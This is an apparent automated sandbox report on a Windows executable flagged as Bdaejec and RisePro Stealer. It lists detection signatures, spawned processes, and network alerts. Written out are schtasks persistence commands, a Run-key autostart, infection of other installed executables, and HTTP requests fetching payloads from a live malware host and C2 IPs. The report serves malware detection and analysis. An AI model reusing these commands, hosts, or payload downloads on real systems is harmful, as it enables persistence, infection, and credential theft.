Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Lisect_AVT_24003_G1A_89.exe

Overview

General Information

Sample name:Lisect_AVT_24003_G1A_89.exe
Analysis ID:1481168
MD5:ee50f2db274c7abdbae3713a14020c24
SHA1:312af659d98d04b23c6ab5f5324604fd04a96777
SHA256:60285015f8b5e32f20411d30b7c64d8748827409275f5a42053b307bc2ff17de
Tags:exe
Infos:

Detection

Bdaejec, RisePro Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Bdaejec
Yara detected RisePro Stealer
AI detected suspicious sample
Contains functionality to check for running processes (XOR)
Contains functionality to inject threads in other processes
Found stalling execution ending in API Sleep call
Hides threads from debuggers
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
PE file has nameless sections
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)

Classification

  • System is w10x64
  • Lisect_AVT_24003_G1A_89.exe (PID: 4912 cmdline: "C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe" MD5: EE50F2DB274C7ABDBAE3713A14020C24)
    • jHYZko.exe (PID: 6484 cmdline: C:\Users\user\AppData\Local\Temp\jHYZko.exe MD5: F7D21DE5C4E81341ECCD280C11DDCC9A)
      • WerFault.exe (PID: 412 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6484 -s 1612 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • schtasks.exe (PID: 7104 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 6540 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • MPGPH131.exe (PID: 5272 cmdline: C:\ProgramData\MPGPH131\MPGPH131.exe MD5: EE50F2DB274C7ABDBAE3713A14020C24)
  • MPGPH131.exe (PID: 3692 cmdline: C:\ProgramData\MPGPH131\MPGPH131.exe MD5: EE50F2DB274C7ABDBAE3713A14020C24)
  • RageMP131.exe (PID: 1716 cmdline: "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe" MD5: EE50F2DB274C7ABDBAE3713A14020C24)
    • jHYZko.exe (PID: 2516 cmdline: C:\Users\user\AppData\Local\Temp\jHYZko.exe MD5: F7D21DE5C4E81341ECCD280C11DDCC9A)
      • cmd.exe (PID: 360 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\2b7051ed.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security
    0000000F.00000002.4457547906.00000000008C1000.00000040.00000001.01000000.0000000A.sdmpJoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security
      00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmpJoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security
        00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmpJoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security
          Process Memory Space: Lisect_AVT_24003_G1A_89.exe PID: 4912JoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security
            Click to see the 5 entries

            System Summary

            barindex
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe, ProcessId: 4912, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RageMP131
            No Snort rule has matched
            Timestamp:2024-07-25T05:10:44.519984+0200
            SID:2807908
            Source Port:49732
            Destination Port:799
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-25T05:09:55.531590+0200
            SID:2807908
            Source Port:49704
            Destination Port:799
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-25T05:10:31.462461+0200
            SID:2049060
            Source Port:49728
            Destination Port:50500
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-25T05:10:02.223135+0200
            SID:2807908
            Source Port:49707
            Destination Port:799
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-25T05:10:00.675949+0200
            SID:2046269
            Source Port:49705
            Destination Port:50500
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-25T05:10:30.346508+0200
            SID:2807908
            Source Port:49727
            Destination Port:799
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-25T05:10:13.800528+0200
            SID:2022930
            Source Port:443
            Destination Port:49716
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-25T05:09:59.332194+0200
            SID:2807908
            Source Port:49706
            Destination Port:799
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-25T05:10:06.727757+0200
            SID:2046269
            Source Port:49709
            Destination Port:50500
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-25T05:10:51.379391+0200
            SID:2022930
            Source Port:443
            Destination Port:49733
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-25T05:10:06.727684+0200
            SID:2046269
            Source Port:49708
            Destination Port:50500
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-25T05:10:38.238368+0200
            SID:2807908
            Source Port:49730
            Destination Port:799
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-25T05:10:34.439275+0200
            SID:2046269
            Source Port:49728
            Destination Port:50500
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-25T05:10:32.891475+0200
            SID:2807908
            Source Port:49729
            Destination Port:799
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-25T05:10:03.590242+0200
            SID:2049060
            Source Port:49709
            Destination Port:50500
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-25T05:10:23.933973+0200
            SID:2028371
            Source Port:49726
            Destination Port:443
            Protocol:TCP
            Classtype:Unknown Traffic
            Timestamp:2024-07-25T05:09:57.684082+0200
            SID:2049060
            Source Port:49705
            Destination Port:50500
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-25T05:09:54.991218+0200
            SID:2838522
            Source Port:50908
            Destination Port:53
            Protocol:UDP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-25T05:10:41.347942+0200
            SID:2807908
            Source Port:49731
            Destination Port:799
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: Lisect_AVT_24003_G1A_89.exeAvira: detected
            Source: http://ddos.dnsnb8.net:799/cj//k3.rarURL Reputation: Label: malware
            Source: http://ddos.dnsnb8.net:799/cj//k3.rarURL Reputation: Label: malware
            Source: http://ddos.dnsnb8.net:799/cj//k2.rarURL Reputation: Label: malware
            Source: http://ddos.dnsnb8.net/URL Reputation: Label: malware
            Source: http://ddos.dnsnb8.net:799/cj//k1.rarURL Reputation: Label: malware
            Source: http://ddos.dnsnb8.net:799/cj//k1.rarky.tth.txtpAvira URL Cloud: Label: phishing
            Source: http://ddos.dnsnb8.net:799/cj//k2.rarZAvira URL Cloud: Label: phishing
            Source: http://ddos.dnsnb8.net/=Avira URL Cloud: Label: phishing
            Source: http://ddos.dnsnb8.net:799/cj//k2.rar=xAvira URL Cloud: Label: malware
            Source: http://ddos.dnsnb8.net:799/cj//k1.rar=xAvira URL Cloud: Label: phishing
            Source: http://ddos.dnsnb8.net:799/cj//k4.rar(yAvira URL Cloud: Label: phishing
            Source: http://ddos.dnsnb8.net:799/cj//k2.rarlAvira URL Cloud: Label: malware
            Source: http://ddos.dnsnb8.net:799/cj//k4.rarC:Avira URL Cloud: Label: malware
            Source: http://ddos.dnsnb8.net:799/cj//k3.rarLAvira URL Cloud: Label: malware
            Source: http://ddos.dnsnb8.net:799/cj//k3.rarOAvira URL Cloud: Label: phishing
            Source: http://ddos.dnsnb8.net:799/cj//k5.rarAvira URL Cloud: Label: malware
            Source: http://ddos.dnsnb8.net:799/cj//k3.rarRAvira URL Cloud: Label: malware
            Source: http://ddos.dnsnb8.net:799/cj//k1.rartC:Avira URL Cloud: Label: malware
            Source: http://ddos.dnsnb8.net:799/cj//k5.rarsC:Avira URL Cloud: Label: malware
            Source: http://ddos.dnsnb8.net:799/cj//k1.rarExhAvira URL Cloud: Label: phishing
            Source: http://ddos.dnsnb8.net:799/cj//k4.rarAvira URL Cloud: Label: malware
            Source: http://ddos.dnsnb8.net:799/cj//k1.rarmAvira URL Cloud: Label: phishing
            Source: http://ddos.dnsnb8.net:799/cj//k5.rarHxgAvira URL Cloud: Label: malware
            Source: http://ddos.dnsnb8.net:799/cj//k3.rarpy_Avira URL Cloud: Label: malware
            Source: http://ddos.dnsnb8.net:799/cj//k2.rarfC:Avira URL Cloud: Label: malware
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeAvira: detection malicious, Label: W32/Jadtre.B
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeAvira: detection malicious, Label: TR/Dldr.Small.Z.haljq
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Jadtre.B
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeAvira: detection malicious, Label: W32/Jadtre.B
            Source: C:\Program Files\7-Zip\Uninstall.exeAvira: detection malicious, Label: W32/Jadtre.B
            Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeAvira: detection malicious, Label: W32/Jadtre.B
            Source: ddos.dnsnb8.netVirustotal: Detection: 12%Perma Link
            Source: http://ddos.dnsnb8.net:799/cj//k2.rarZVirustotal: Detection: 12%Perma Link
            Source: http://ddos.dnsnb8.net:799/cj//k2.rar=xVirustotal: Detection: 11%Perma Link
            Source: http://ddos.dnsnb8.net/=Virustotal: Detection: 14%Perma Link
            Source: http://ddos.dnsnb8.net:799/cj//k2.rarlVirustotal: Detection: 10%Perma Link
            Source: http://ddos.dnsnb8.net:799/cj//k4.rarC:Virustotal: Detection: 12%Perma Link
            Source: http://ddos.dnsnb8.net:799/cj//k5.rarVirustotal: Detection: 12%Perma Link
            Source: http://ddos.dnsnb8.net:799/cj//k3.rarOVirustotal: Detection: 15%Perma Link
            Source: http://ddos.dnsnb8.net:799/cj//k3.rarLVirustotal: Detection: 8%Perma Link
            Source: http://ddos.dnsnb8.net:799/cj//k3.rarRVirustotal: Detection: 16%Perma Link
            Source: http://ddos.dnsnb8.net:799/cj//k1.rartC:Virustotal: Detection: 12%Perma Link
            Source: http://ddos.dnsnb8.net:799/cj//k4.rarVirustotal: Detection: 12%Perma Link
            Source: http://ddos.dnsnb8.net:799/cj//k5.rarsC:Virustotal: Detection: 15%Perma Link
            Source: http://ddos.dnsnb8.net:799/cj//k1.rarmVirustotal: Detection: 15%Perma Link
            Source: http://ddos.dnsnb8.net:799/cj//k2.rarfC:Virustotal: Detection: 9%Perma Link
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeReversingLabs: Detection: 94%
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeVirustotal: Detection: 86%Perma Link
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeReversingLabs: Detection: 94%
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeVirustotal: Detection: 86%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeReversingLabs: Detection: 92%
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeVirustotal: Detection: 90%Perma Link
            Source: Lisect_AVT_24003_G1A_89.exeReversingLabs: Detection: 94%
            Source: Lisect_AVT_24003_G1A_89.exeVirustotal: Detection: 86%Perma Link
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeJoe Sandbox ML: detected
            Source: C:\Program Files\7-Zip\Uninstall.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJoe Sandbox ML: detected
            Source: Lisect_AVT_24003_G1A_89.exeJoe Sandbox ML: detected
            Source: Lisect_AVT_24003_G1A_89.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr

            Spreading

            barindex
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_0108B3B5 recv,FindFirstFileExW,GetLastError,0_2_0108B3B5
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_01898D7B FindFirstFileA,0_2_01898D7B
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_0108B41B GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx,0_2_0108B41B
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeCode function: 1_2_00E629E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,1_2_00E629E2
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 7_2_0064B3B5 recv,FindFirstFileExW,GetLastError,7_2_0064B3B5
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 7_2_0064B41B GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx,7_2_0064B41B
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 8_2_0064B3B5 recv,FindFirstFileExW,GetLastError,8_2_0064B3B5
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 8_2_0064B41B GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx,8_2_0064B41B
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeCode function: 1_2_00E62B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,1_2_00E62B8C
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior

            Networking

            barindex
            Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 799
            Source: global trafficTCP traffic: 192.168.2.5:49704 -> 44.221.84.105:799
            Source: global trafficTCP traffic: 192.168.2.5:49705 -> 193.233.132.62:50500
            Source: Joe Sandbox ViewIP Address: 44.221.84.105 44.221.84.105
            Source: Joe Sandbox ViewIP Address: 193.233.132.62 193.233.132.62
            Source: Joe Sandbox ViewIP Address: 193.233.132.62 193.233.132.62
            Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k4.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k5.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_00FCDB60 recv,WSAStartup,getaddrinfo,closesocket,socket,connect,closesocket,FreeAddrInfoW,WSACleanup,FreeAddrInfoW,0_2_00FCDB60
            Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k4.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k5.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: ddos.dnsnb8.net
            Source: jHYZko.exe, 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmp, jHYZko.exe, 00000001.00000003.2014334444.0000000001240000.00000004.00001000.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000003.2362229934.0000000000AE0000.00000004.00001000.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000002.2542328869.00000000001E3000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
            Source: jHYZko.exe, 00000010.00000003.2369419269.0000000000C65000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000002.2542768504.0000000000C48000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000003.2369186739.0000000000C5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net/
            Source: jHYZko.exe, 00000001.00000003.2022506492.00000000012C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net/=
            Source: jHYZko.exe, 00000010.00000003.2369326263.0000000000CB3000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000002.2542768504.0000000000C40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
            Source: jHYZko.exe, 00000010.00000003.2369326263.0000000000CB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar=x
